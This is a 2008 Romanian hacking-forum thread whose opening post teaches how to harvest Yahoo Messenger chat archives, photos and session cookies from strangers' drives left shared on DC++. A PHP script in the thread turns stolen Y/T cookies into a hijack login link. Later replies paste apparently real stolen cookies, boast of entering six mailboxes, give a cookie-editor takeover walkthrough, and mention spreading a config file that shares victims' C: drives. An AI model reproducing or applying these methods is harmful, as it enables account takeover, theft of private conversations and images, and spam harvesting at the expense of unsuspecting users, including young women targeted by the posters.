loki Posted June 3, 2008 Report Posted June 3, 2008 Un tutorial adresat kinderilor si celor care mai cauta pe DC cate un pitziponc sau o cocalara din plictiseala la servici:Ma saturasem de foldere "fete proaste shereaza pe DC" si ma gandeam sa caut singur sursele Presupunand ca ma plictisesc intr-o zi si vreau sa caut curiozitati pe un hub, hai sa vedem ce face omu pe messenger.Pe scurt: ce e important de agatat de pe un comp care ruleaza yahoo messenger:c:\progra~1\Yahoo!\Messenger\Cache\Icon = pozele folosite ca avatar de-a lungul timpului (cea curenta o gasiti pe http://img.msg.yahoo.com/avatar.php?yids=userc:\progra~1\Yahoo!\Messenger\Cache\Photo Sharing = ramasite de cand userul a schimbat poze prin serviciul photo sharing.c:\progra~1\Yahoo!\Messenger\Profiles = toate conturile care au fost folosite pe messenger. Sub forma:c:\progra~1\Yahoo!\Messenger\Profiles\nume\My Icons\*.png = avatarec:\progra~1\Yahoo!\Messenger\Profiles\nume\Archive\Messages\interlocutor\*.dat = discutiiAsta se face cu discheta. Acum multi useri (romani majoritatea) isi scapa la share discul C continand Documents and Settings si Program Files. Pai hai sa profitam putin:Ori bifati ce e in paranteza ori apasati pe "Type" sa le aranjati dupa tip. - Search @yahoo (bifand "documents" = txt) gasiti cookies. Aranjati dupa dimensiune si downloadati cele intre 800 bytes si 1,5K. Deschideti cu notepad si la sfarsit puteti gasi cookie-urile Y si T (Y v=... si T z=...) Puteti fura sesiunea. Odata intrat search dupa "password", "parola" sau daca nu, cautati servicii cu mailuri gen "v-ati inregistrat, nume x parola y" si aveti un cont deoparte. Sau un save la addressbook pentru un eventual spam banos (votati Ludovic Orban! ). - Search Cache Photo Sharing Yahoo. (bifati poze) Yahoo Messenger isi mai pastreaza in cache fisierele transmise prin Photo Sharing. Select All, download, poze, alea alea. Downloadati folderele Photo Sharing sau folderele care incep cu S si au cateva litere (gen S0878). Pozele cu --_t in coada sunt thumbnails, le puteti selecta si downloada pentru a avea o imagine despre cine e online. Pozele cu --_m sunt mai mari. Se gasesc in program files\yahoo!\cache\photo sharing- Search Yahoo Messenger Profiles gasiti lista userilor si foldere cu discutia lor pe mess. Downloadati folderele profiles/nume pentru a putea fura discutii. Contine archive cu interlocutorii (daca a bifat optiunea de salvat discutii) si My Icons cu avatare folosite. Pentru decriptarea discutiilor copiati nume in c:\program files\yahoo!\messenger\profiles\ si folositi yahdecode (google)- Search simplu My Icons pentru o intreaga colectie de avatare (progra~1\yahoo!\messenger\profiles\nume\my icons). Sau cache icon pentru toate avatarele folosite de useri de cand si-a pus messu (progra~1\yahoo!\cache\icon) pe care le redenumiti apoi *.pngPS Progra~1=Program Files, lene de taste. Quote
TorQue9 Posted June 3, 2008 Report Posted June 3, 2008 B6apin513tdbc5&b=3&s=vmyahoo.com/102434253209632065574251705428829918097*YLSv=1&p=1&n=0yahoo.com/16005467422723205591861044680029934825*Fa=b8X47g8MvT9ENuLi_SulGnFbUtjAIaGQ6cbEH9RQrGNnnN.w5KqF.Hg7xtcT_oB9KaueKkCbIpCMPrgPaSJaoW3fTEZH.8fPmN5O7Kv3CvGJbzZNts4kzP.m1Dwu.0GexjIEjCrH.GCDVPbFZQ--&b=Mxc7yahoo.com/108899215360032071525273657184029934960*PHfn=uYSiCiUeFZHOMuVvoS0-&l=en-USyahoo.com/1088163502899230077973273678184029934960*Cmg=1yahoo.com/10243425320963206557460122209629918699*PLV=1.1&d=Ic9QNAffGIVDglCtqChmUn3siZWE7WEpXC6oXJ9YwifuXPPQVKi4ZgTMPTWwueU-yahoo.com/1600425531750429995576223470630429922151*LYCl_v=2&l_lv=10&l_l=18ao_h0f&l_s=qz54t4qwrsqquyv51w0z4xxwtx31x1t0&l_lid=ee94mu&l_r=hs&l_lc=0_0_0_0_0&l_mpr=20_0_0&l_um=0_0_0_0_0yahoo.com/108899215360032071525273678184029934960*YMRAD484741854*0_0_0_0_0_39469085_1_0_39469164_1yahoo.com/1088200432025630638739333636656029922765*Umt=uoQX0Z2MhYkW0PbxbCN8Kc0TLwEQyd27P4bYVg--&ux=s1eEIB&un=b1oa8vbdrmb43yahoo.com/1024325102745630147414149274115229927138*Qq1=AACAAAAAAAAAAA--&q2=SBSYYg--yahoo.com/1088151632716830662192132070464029927535*Explica concret ce sa extrag din cookie-ul de mai sus? Este luat de pe DC la intamplare. Quote
loki Posted June 3, 2008 Author Report Posted June 3, 2008 Gasesc un singur cookie pe zi valid. Asta doar la useri care bifeaza remember. Ce ai gasit nu-ti foloseste. In coada fisierului cookie tre sa ai*Yv=1&n=00o0...yahoo.com/102434253209632065574216855537629934769*Tz=UD/QIBUXm...yahoo.com/102434253209632065574216855537629934769* Si atunci e bun (asta e de ieri). EDIT: e o pustoaica care si-a pus numele ca parola, am sters din cookie sa-i las totusi conturile in pace.Testeaza intai pe tine: da un remember password, ia un cookie yahoo de la tine si incearca sa intri pe mail de pe un alt browser folosind Y si T.Script de extras din cookie yahoo: salvati intr-un fisier cookie.php pe hostul dvs.<?php$link="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];$cookie=$_POST['cookie'];?><FORM action=<? echo $link;?> method="post" name="read"> <Label for "cookie">Copy-paste cookie file</label> <textarea name="cookie" height=100></textarea><INPUT type="submit" value="Send"></form><?if($cookie){ $cookietable = explode('*', $cookie); for($i=0;$i<count($cookietable); $i++) { if(($cookietable[$i][2]=='Y')&&($cookietable[$i][5]=='v')) $y=substr($cookietable[$i],5); if(($cookietable[$i][2]=='T')&&($cookietable[$i][5]=='z')) $t=substr($cookietable[$i],5); }$y=explode("yahoo.com",$y); $y=$y[0]; $t=explode("yahoo.com",$t); $t=$t[0];if($y&&$t) { $y = ereg_replace(';', '',$y); $y = ereg_replace('&', '%26',$y); $y = ereg_replace('=', '%3D',$y); $y = 'Y%3D'.$y; $t = ereg_replace(';', '',$t); $t = ereg_replace('&', '%26',$t); $t = ereg_replace('=', '%3D',$t); $t = 'T%3D'.$t; echo '[url="http://msg.edit.yahoo.com/config/reset_cookies?.y='.$y.'&.t='.$t.'&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0"]Test Cookie Link[/url]'; } else echo "Lipsesc Y sau T.";}?>Puteti optimiza prin incarcarea fisierului cookie cu un <INPUT type="file"> in acest caz modificati liniile 17-18 cu { if(($cookietable[$i][1]=='Y')&&($cookietable[$i][3]=='v')) $y=substr($cookietable[$i],3); if(($cookietable[$i][1]=='T')&&($cookietable[$i][3]=='z')) $t=substr($cookietable[$i],3); }Asta datorita enter-urilor. La copy paste dintr-un cookie %0A devine %0D%0A. La citirea din fisier, nu. Quote
puskin Posted June 3, 2008 Report Posted June 3, 2008 ce face:cauta un fisier numit DCPlusPlus.xmldupa aceea il scrie:<?xml version="1.0" encoding="windows-1252"?><DCPlusPlus><Settings>....</Settings><share><Directory>C:</Directory></Share></DCPlusPlus>deja l-am raspandit pe retele....ca vedeam ca nu prea se mai baga C: -ul la share Quote
Zamolxis666 Posted June 3, 2008 Report Posted June 3, 2008 eu am gasit asa ceva in fisier dar tot nu sunt lamurit cum aflu parola:Bf3hcf2141lncs&b=3&s=75yahoo.com/10243425320963206557492512940829928502*CPv=70009&br=i&pc=msgryahoo.com/1024233006784029940835268367920029934800*YLSv=1&p=1&n=0yahoo.com/160054674227232055918197084265629933089*Fa=GV8pRw4MvTBuwsxPOgcb41Ih3dJY2ximyD8QcAIxgRu4622CCL94FFpaB7mRGsXAH.6amb0-&b=6O3gyahoo.com/102434253209632065574209981265629933089*Yv=1&n=752pfcp33464i&l=3h6_2h8ij80dwr/o&p=m1tvvro012000000&iz=087076&r=hk&lg=en-US&intl=usyahoo.com/102434253209632065574319534857629929319*PHfn=G0w8mlxPU4ddoAnhPd6A&l=en-USyahoo.com/1088163502899230077973186676102429929331*Tz=H3OOIBHL2SIB1FiTnIDRHUyMTQwBjYwNTE0MzI3NDc-&a=QAE&sk=DAAALhSQpnS2u3&ks=EAA684dP2j6NAJIeCprrH8eiw--~A&d=c2wBTmpNM0FURTNNall6TkRVd016QS0BYQFRQUUBZwFiR184clRELjBCWVhHZEhtUXRqSzBnLS0BdGlwAVZsSDFhRAF6egFIM09PSUJBN0U-yahoo.com/102434253209632065574210025265629933089*Cmg=1yahoo.com/102434253209632065574319545857629929319* Quote
c0ld Posted June 3, 2008 Report Posted June 3, 2008 Da,metoda e foarte buna. Dar, cum poti afla parola ? Intru in mail'ul respectivului, dar cum pot afla parola ? Quote
Sir-NyCkY Posted June 3, 2008 Report Posted June 3, 2008 Da,metoda e foarte buna. Dar, cum poti afla parola ? Intru in mail'ul respectivului, dar cum pot afla parola ?Pentru ce sa o mai afli daca o poti schimba :twisted: Quote
c0ld Posted June 3, 2008 Report Posted June 3, 2008 pai nu o poti schimba .. trebuie sa introduci parola veche Quote
loki Posted June 3, 2008 Author Report Posted June 3, 2008 eu am gasit asa ceva in fisier dar tot nu sunt lamurit cum aflu parola:Te citez:http://msg.edit.yahoo.com/config/reset_cookies?.y=Y=v%3D1%26n%3D752pfcp33464i%26l%3D3h6_2h8ij80dwr/o%26p%3Dm1tvvro012000000%26iz%3D087076%26r%3Dhk%26lg%3Den-US%26intl%3Dus&.t=T=z%3DH3OOIBHL2SIB1FiTnIDRHUyMTQwBjYwNTE0MzI3NDc-%26a%3DQAE%26sk%3DDAAALhSQpnS2u3%26ks%3DEAA684dP2j6NAJIeCprrH8eiw--~A%26d%3Dc2wBTmpNM0FURTNNall6TkRVd016QS0BYQFRQUUBZwFiR184clRELjBCWVhHZEhtUXRqSzBnLS0BdGlwAVZsSDFhRAF6egFIM09PSUJBN0U-&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0Ms pentru cookie (posibil sa mai aiba erori scriptu, eu il testam in mozilla, aici am IE si nu a mers cu ce ai scris). pai nu poti afla parola, dar deobicei o gasesti in mail, unii si-o pun la fel si la alte servicii.Ai acces in contu omului vreo 2 zile, daca nu gasesti nimic interesant cauti altul. Macar salvezi un addressbook, poate in viata faci bani cu spam mails. Quote
c0ld Posted June 3, 2008 Report Posted June 3, 2008 intr'o singura zi intrai pe 6 mail'uri diferite . F folositoare metoda. Quote
DeciBel Posted June 3, 2008 Report Posted June 3, 2008 B9l3ponl3vhid7&b=3&s=otyahoo.com/102434253209632065574138997860829923302*Fa=6bKPwIkMvTC6ZJMshBv7y_0.roxYQ7bOn1aZ2nplFVl7ptIpRMDGoQCdG3XYb1bnGjuMlU0lmPYC0DGprzfTZACbe2iX7XhHDNbVqxQ_6evG&b=wWJOyahoo.com/10243425320963206557487979950429934826*YLSv=1&p=0&n=0yahoo.com/16005467422723205591894980401629934554*PHfn=NAGNlzUMJeMoDBvC9zM-&l=en-USyahoo.com/10243425320963206557487979950429934826*Cmg=1yahoo.com/102434253209632065574343549364829925937*Umt=K9Z1M52MhYlhgvWJOhubYAwO2gRiRA5pXhzjiA--&ux=eiKJIB&un=85ov9jpoeocigyahoo.com/102498540748830072022220636918429929996*CPv=70010&br=i&pc=msgryahoo.com/1024164269619229936023183500755229929988*LYCl_v=0&l_lv=10&l_s=yw5z0uxsvyqru1s2zttsuztx2vuvs1rq&l_um=0_0_1_0_0yahoo.com/1024313833881632108254278989552029933630*adxc8880@1212009274@1yahoo.com/1088258417280029945700283489552029933630*s_vsn_yahoogroupsygprod_19027170286692yahoo.com/1088315342745630669289295141492829934632*eu nu am gasit niciun T....fii mai explicit Quote
TorQue9 Posted June 3, 2008 Report Posted June 3, 2008 Multumesc de raspuns lokipaki, m-am lamurit.DeciBel, detinatorul cookie-ului trebuie sa bifeze casuta accea cu remember me, si daca nu da nu-ti va mai aparea in fisier T si Y, mai cauta ca sigur vei gasi . Quote
loki Posted June 3, 2008 Author Report Posted June 3, 2008 daca nu ai gasit nici un T inseamna ca nu e bun. Nu mai postati, va rog, cookie-uri. Faceti probe pe compul personal si intelegeti. Si credits: RST yahoo cookie grabber pentru metoda, acolo intelegeti mai bine ce e cu Y si T. Quote
TyrNjord Posted June 3, 2008 Report Posted June 3, 2008 o dar haideti sa va zic eu faza tare:) so..prindeti un cookie valid, intrati pe mailu omului...nimic neobisnuit.new tab, webmessenger.yahoo.com...nu e nevoie de autentificare...click sign in si esti pe messu omului:) Quote
Petzy Posted June 3, 2008 Report Posted June 3, 2008 Nu am inteles deloc faza cu Y si T, unde trebuie sa fie? ce fac cu cookie-ul daca este bun ? cum intru? mai greu de cap ineseara,sry Quote
c0ld Posted June 4, 2008 Report Posted June 4, 2008 Pentru Petzy .. Deci mai pe scurt: 1. creezi pe localhost un php (de exemplu cookie.php) care sa contina al doilea cod dat de lokipaki - al treilea post2.cauti pe dc++ "@yahoo" , downloadezi ce e mai mic de 1.5 kb si mai mare de 800 b 3.deschizi fisierul downloadat cu WORDPAD (nu cu notepad) si copiezi ce e in el4.intra apoi in browser pe adresa localhost/numele_pe_care_l-ai_ales_la_pct_1.php5.Dai paste in caseta de text la ce ai copiat in Wordpad si dai send6.Daca iti apare "Lipsesc Y sau T" inseamna ca nu e bun.Daca iti apare "Test cookie link" dai click si te duce in mailul persoanei respective. Quote
Codeck Posted June 4, 2008 Report Posted June 4, 2008 Salut..am luat un fisier txt de pe ODC dar knd il deschid cu notepad imi apare "Bd3i4sjl3uhq39&b=3&s=8ryahoo.com/102434253209632065574108020681629920879*YLSv=1&p=0&n=0yahoo.com/160054674227232055918223809067229921143*Fa=_ENMVT8MvT.Ncxj.7eXL9egikHwIWJ_XZlwV9pl5VOAKBiEIngYngJpv2CiiWsH.8lfj7Vtj3O_3X_dpudbrANyu3pgjkNZbroaZFV429vq2&b=VMHFyahoo.com/102434253209632065574393822611229932628*PHfn=zL46WjVig5J.BlGHd9Ps&l=en-USyahoo.com/102434253209632065574393822611229932628*Cmg=1yahoo.com/102434253209632065574266773796829921142*LYCl_v=1&l_lv=10&l_s=q02yz4xwy1vwuqt3zwyyz0vv554trsws&l_lid=nd853g&l_lc=0_0_0_0_100&l_um=0_0_1_0_0yahoo.com/108899215360032071525294314232029932205*LCGuLi1049601=1yahoo.com/1024239050956829959042143647736029921715*YMRAD785650800*0_0_7318736_1yahoo.com/1088200432025630638739147101736029921715*adxc8880@1210830595@1yahoo.com/1088118443302429942956143562574429930886*"Ce tre sa-i fac lu asta? deo ora imi tot bat capu Quote
Petzy Posted June 4, 2008 Report Posted June 4, 2008 Citeste postul de mai sus in care mi sa explicat mie Quote
H4e Posted June 5, 2008 Report Posted June 5, 2008 k am inteles faza cu cookieurile dar dak am un cookie valid ma pot loga fara sa mai am un site cu cookie grabber...parca avea mozilla un add-on cu modificare cookieului? Quote
Codeck Posted June 5, 2008 Report Posted June 5, 2008 Multumesc mult baIETZI...acum am inteles. Si inca ceva.. dak am ets de la un id de mess...si intrand de pe mess pe mail..e posibil sa aflu parola? Quote
Petzy Posted June 5, 2008 Report Posted June 5, 2008 Multumesc mult baIETZI...acum am inteles. Si inca ceva.. dak am ets de la un id de mess...si intrand de pe mess pe mail..e posibil sa aflu parola?Daca intri pe un cont de yahoo prin aproape orice metoda(fara sa stii deja parola) (cookie si alte metode) nu o poti afla decat daca spre exemplu utilizatorul respectiv o are salvata prin mail undeva / notata sau are mailuri primite din alte parti unde scrie parola la contul de acolo atunci poti incerca parola aia si la yahoo pt ca majoritatea o pun la fel. Quote
paxnWo Posted June 5, 2008 Report Posted June 5, 2008 nu imi merge ... am downloadat 150 de cookie-uri ... multe dintre ele aveau T si Y. am copiat tot cookie-ul aici : http://zuljin.ath.cx/cuchi.phpnu merge ... zice: Lipsesc Y sau T.am incercat sa copiez doar Y si T ... la fel zice ... apoi am incercat pe mai multe browsere , tot nu merge ... plus ca am integrat si codul pentru liniile 17 si 18 ... any help ? thx Quote
H4e Posted June 5, 2008 Report Posted June 5, 2008 Deci sa va invat ceva lot easier(doar pt mozzila)1.Luati Add'n adit cookies de acihttps://addons.mozilla.org/en-US/firefox/addon/5732.intrati pe mailul vostru3.va duceti sus la Tools/Cookie editor(ar trebui sa fie ultimul)4.Printre ultimele cookieuri o sa vedeti cookieurile yahoo (doar cele yahoo.com nu shi www.yahoo.com)Normal sunt trei cookieuri yahoo.com (B Y T)5.Dati dublu click pe yahoo.com Y shi schimbati content cu cel din cookieul furat(din cookieul furat nu luati tot Y-ul luati doar de la "v="..pana la".com/")6.Acelasi lucru faceti shi cu cookiel yahoo.com T(doar de la "z=" pana la ".com/")7.Dati save dupa ce ati terminat de schiombat cookieurile shi inchideti cookie editor 8.Dati un reload la pagina voastra de mail 9.Enjoy itP.S.:srry pt greselile de ortografie, punctuatie etc.... Quote
loki Posted June 5, 2008 Author Report Posted June 5, 2008 Deci sa va invat ceva lot easier(doar pt mozzila)1.Luati Add'n adit cookies de acihttps://addons.mozilla.org/en-US/firefox/addon/5732.intrati pe mailul vostru3.va duceti sus la Tools/Cookie editor(ar trebui sa fie ultimul)4.Printre ultimele cookieuri o sa vedeti cookieurile yahoo (doar cele yahoo.com nu shi www.yahoo.com)Normal sunt trei cookieuri yahoo.com (B Y T)5.Dati dublu click pe yahoo.com Y shi schimbati content cu cel din cookieul furat(din cookieul furat nu luati tot Y-ul luati doar de la "v="..pana la".com/")6.Acelasi lucru faceti shi cu cookiel yahoo.com T(doar de la "z=" pana la ".com/")7.Dati save dupa ce ati terminat de schiombat cookieurile shi inchideti cookie editor 8.Dati un reload la pagina voastra de mail 9.Enjoy itP.S.:srry pt greselile de ortografie, punctuatie etc....interesant, dar nu zi "a lot easier"- click dreapta pe cookie- view as text- click dreapta select all - copy- http://localhost/scriptu.php- paste- click "test cookie link"In rest metoda ta e foarte buna ca acopera si partea de mozila. Nu am testat-oPentru cei care zice ca "lipsesc" si stiu putin php bagati in cod cate un echo $y."" .$t.""; sa il depanati. Desi codul e destul de simplu de inteles, contine un urlencoder pentru cateva caractere din cookie: & si =. Na deschideti cookie intr-un hex editor si vedeti daca enterul e 0x0a.Nu intotdeauna merge linkul: se poate sa fie expirat cookie-ul.pax.nWo: testat, pune exact scriptul; liniile 16-17 is de modificat pentru fisiere, nu le schimba (ca vad ca nu merge). Apoi deschizi cu notepad cookie si dai copy-paste. Mai trebuie perfectionat. Quote
